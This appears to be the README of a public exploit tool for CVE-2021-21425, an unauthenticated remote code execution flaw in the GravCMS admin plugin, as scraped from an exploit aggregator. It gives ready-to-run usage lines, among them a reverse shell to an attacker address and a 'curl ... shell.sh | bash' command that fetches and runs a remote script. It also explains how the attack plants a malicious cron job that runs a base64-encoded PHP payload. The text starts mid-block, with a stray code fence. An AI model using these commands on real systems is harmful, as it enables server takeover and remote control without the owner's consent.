Exploit for Improper Access Control in Getgrav Grav-Plugin-Admin CVE-2021-21425

## https://sploitus.com/exploit?id=1B1A3142-CD90-5BA0-A772-AC630842FD7C
# CVE-2021-21425 - GravCMS Unauthenticated RCE

Unauthenticated Remote Code Execution exploit for GravCMS  

# Custom command
python3 exploit.py -t http://target -c "id"
```

### Examples

```bash
# Get reverse shell on target
python3 exploit.py -t http://10.10.10.5 -s 10.10.14.5 4444

# Execute command
python3 exploit.py -t http://grav.local:8080 -c "curl http://10.10.14.5/shell.sh | bash"
```

## Requirements

```bash
pip install requests
```

## How It Works

1. Fetches `/admin` to extract the `admin-nonce` token (no auth required due to vulnerability)
2. Sends POST to `/admin/config/scheduler` with malicious cron job configuration
3. Scheduler executes PHP payload via `/usr/bin/php -r eval(base64_decode(...))`
4. PHP writes base64-decoded reverse shell to `/tmp/rev.sh` and executes it

The cron job runs every minute (`* * * * *`), so shell arrives within 60 seconds.

## Timeline

- **2021-03-29** - Disclosed by Mehmet Ince
- **2021-04-01** - Patched in Grav Admin Plugin

## References

- [NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2021-21425)
- [GitHub Advisory](https://github.com/getgrav/grav-plugin-admin/security/advisories/GHSA-wg37-cf5x-55hq)
- [ExploitDB](https://www.exploit-db.com/exploits/49973)
- [Pentest Blog - Mehmet Ince](https://pentest.blog/)

## Disclaimer

For authorized security testing only. Ensure you have written permission before testing against any system.